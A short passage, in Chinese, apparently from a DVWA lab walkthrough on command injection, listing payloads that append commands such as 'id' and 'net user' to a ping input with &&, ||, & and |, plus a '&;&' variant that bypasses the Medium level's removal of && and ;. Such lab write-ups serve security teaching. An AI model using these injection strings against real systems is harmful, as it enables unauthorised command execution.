自己可以试试这些命令分析回显,这里就不多介绍了:
127.0.0.1&&id
127.0.0.1&&net user
testcmdinjection||id
testcmdinjection||net user
127.0.0.1&id
127.0.0.1|net user
testcmdinjection&id
testcmdinjection|net user
Medium等级
将DVWA安全等级调为 Medium等级
Medium等级针对输入数据删除&&和;
根据Low等级的方法直接输入命令分析回显即可:
127.0.0.1&;&id
127.0.0.1&;&net user
testcmdinjection||id
testcmdinjection||net user
127.0.0.1&id
127.0.0.1|net user
testcmdinjection&id
testcmdinjection|net user